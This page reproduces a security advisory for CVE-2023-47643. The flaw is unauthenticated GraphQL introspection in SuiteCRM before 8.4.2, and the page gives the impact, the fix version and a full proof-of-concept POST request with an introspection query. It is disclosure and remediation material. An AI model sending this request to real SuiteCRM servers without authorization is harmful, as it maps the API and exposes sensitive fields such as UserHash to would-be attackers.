Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-47643: Unauthenticated Graphql Introspection Enabled

SuiteCRM is a Customer Relationship Management (CRM) software application. Prior to version 8.4.2, Graphql Introspection is enabled without authentication, exposing the scheme defining all object types, arguments, and functions. An attacker can obtain the GraphQL schema and understand the entire attack surface of the API, including sensitive fields such as UserHash. This issue is patched in version 8.4.2. There are no known workarounds.

CVE
Open in Source
#vulnerability#linux#js#auth#firefox

Impact

Graphql Introspection is enabled without authentication, exposing the scheme defining all object types, arguments, and functions.

An attacker can obtain the GraphQL schema and understand the entire attack surface of the API, including sensitive fields such as UserHash.

Proof of Concept

Send the following POST request, which will return the full introspection scheme:

POST /api/graphql HTTP/2
Host: localhost
Cookie:....
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://localhost/
X-Xsrf-Token: ....
Content-Type: application/json
Content-Length: 1732
Origin: https://localhost
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

{ “query":” query IntrospectionQuery { __schema { queryType { name } mutationType { name } subscriptionType { name } types { …FullType } directives { name description args { …InputValue } onOperation #Often needs to be deleted to run query onFragment #Often needs to be deleted to run query onField #Often needs to be deleted to run query } } }

    fragment FullType on \_\_Type {
        kind
        name
        description
        fields(includeDeprecated: true) {
            name
            description
            args {
                ...InputValue
            }
            type {
                ...TypeRef
            }
            isDeprecated
            deprecationReason
        }
        inputFields {
            ...InputValue
        }
        interfaces {
            ...TypeRef
        }
        enumValues(includeDeprecated: true) {
            name
            description
            isDeprecated
            deprecationReason
        }
        possibleTypes {
            ...TypeRef
        }
    }

    fragment InputValue on \_\_InputValue {
        name
        description
        type {
            ...TypeRef
        }
        defaultValue
    }

    fragment TypeRef on \_\_Type {
        kind
        name
        ofType {
            kind
            name
            ofType {
                kind
                name
                ofType {
                    kind
                    name
                }
            }
        }
    }
"

}

Patches

Has the problem been patched? What versions should users upgrade to?
Patched in version 8.4.2

Workarounds

Is there a way for users to fix or remediate the vulnerability without upgrading?

  • no workarounds

References

Are there any links users can visit to find out more?

  • Why it’s important to disable graphql introspection

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE